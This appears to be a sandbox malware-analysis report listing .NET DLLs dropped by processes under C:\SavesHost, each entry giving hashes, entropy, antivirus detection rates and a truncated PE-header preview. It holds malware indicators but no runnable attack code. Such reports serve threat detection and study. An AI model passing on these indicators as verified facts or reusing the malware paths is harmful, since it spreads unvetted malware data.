                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):39936
                                                                                            Entropy (8bit):5.629584586954759
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):70144
                                                                                            Entropy (8bit):5.909536568846014
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):36352
                                                                                            Entropy (8bit):5.668291349855899
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):41472
                                                                                            Entropy (8bit):5.6808219961645605
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                            MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                            SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                            SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                            SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38400
                                                                                            Entropy (8bit):5.699005826018714
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                            MD5:87765D141228784AE91334BAE25AD743
                                                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):70144
                                                                                            Entropy (8bit):5.909536568846014
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33792
                                                                                            Entropy (8bit):5.541771649974822
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33280
                                                                                            Entropy (8bit):5.634433516692816
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                            MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                            SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                            SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                            SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38912
                                                                                            Entropy (8bit):5.679286635687991
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):36352
                                                                                            Entropy (8bit):5.668291349855899
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):126976
                                                                                            Entropy (8bit):6.057993947082715
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                            MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                            SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                            SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                            SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):39936
                                                                                            Entropy (8bit):5.629584586954759
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38912
                                                                                            Entropy (8bit):5.679286635687991
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):50176
                                                                                            Entropy (8bit):5.723168999026349
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33792
                                                                                            Entropy (8bit):5.541771649974822
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 34%
